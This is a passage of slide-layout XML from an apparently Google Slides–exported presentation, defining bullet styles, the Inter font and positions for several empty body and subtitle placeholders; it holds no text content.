              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-298450" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-298450" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-298450" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-298450" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-298450" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-298450" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Google Shape;48;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2498925" y="1938274"/>
            <a:ext cx="1357800" cy="2483700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-298450" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-298450" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-298450" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-298450" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-298450" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-298450" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Google Shape;49;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4070484" y="1938274"/>
            <a:ext cx="1357800" cy="2483700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-298450" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-298450" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-298450" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-298450" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-298450" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-298450" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Google Shape;50;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5642063" y="1938274"/>
            <a:ext cx="1357800" cy="2483700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-298450" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-298450" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-298450" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-298450" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-298450" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-298450" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;51;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7324219" y="1938274"/>
            <a:ext cx="1357800" cy="2483700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-298450" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-298450" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-298450" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-298450" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-298450" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-298450" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Google Shape;52;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
